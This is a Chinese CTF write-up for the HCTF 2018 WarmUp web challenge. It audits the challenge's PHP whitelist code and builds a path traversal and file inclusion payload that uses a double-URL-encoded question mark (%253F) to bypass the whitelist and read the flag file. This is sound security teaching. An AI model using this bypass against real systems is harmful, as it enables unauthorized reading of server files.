web：[HCTF 2018]WarmUp

题目

点进页面，页面只有一张滑稽脸，没有其他的提示信息

查看网页源代码，发现source.php，尝试访问一下

跳转至该页面，页面显示为一段php代码，需要进行代码审计

 "source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }//isset是判断page是否为空。由于传进来的page为一个字符串且不为空，所以返回false

            if (in_array($page, $whitelist)) {
               //对输入进行判断，是否为白名单类的内容
                return true;
            }/*in_array的意思是判断page里是否包含白名单里的内容 例如source.php  hint.php。
              就是page=source.php或者hint.php才行.所以最后返回了false。*/


            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
       /*这里mb_substr 是个截断，返回0到mb_strpos之间的内容，而mb_strpos 则是查找第一次出现的位置，所以基本可以理解为获取page 两个？之间的字符串，也就是获取file两个？之间的字符串，放到url中就是http://ip/?file=ddd?中的file=ddd*/
            if (in_array($_page, $whitelist)) {
                return true;
            }
/*经过上面的截断代码，page=source.php  所以返回true ,文件可以得到包含，结束，下面的代码就不用在执行了*/

            $_page = urldecode($page);//进行url解码
            //输入的url会进行一次解码，通过这个函数进行再一次解码，所以对“？”要进行二次编码==》%253F（%25是%的url编码，进行过一次后为%3F，在进行一次解码后变为“？”）
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file']) //输入不能为空
        && is_string($_REQUEST['file'])//判断是否为string类型
        && emmm::checkFile($_REQUEST['file'])//调用emm类中的checkFile方法
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
";
    }  
?> 

先访问hint.php看看有没有别的提示信息

根据提示信息，进行目录穿越可获得flag，这里flag写了四次，可能使用四个或五个../

构造payload

http://1f0787c3-39e3-43b6-9583-f8ecb87aae1c.node4.buuoj.cn:81/?file=hint.php%253F../../../../../ffffllllaaaagggg

得到flag

总结

mb_substr()函数返回字符串的一部分，substr()函数，只针对英文字符，如果要分割的中文文字则需要使用mb_substr()。

若start参数是负数且length小于或等于start，则length为0

如果在测试时没有匹配到指定符号，将返回字符串长度

代码审计参考链接：

[HCTF 2018]WarmUp_ke1nys的博客-CSDN博客

[HCTF 2018]WarmUp_浑水摸鱼的咸鱼的博客-CSDN博客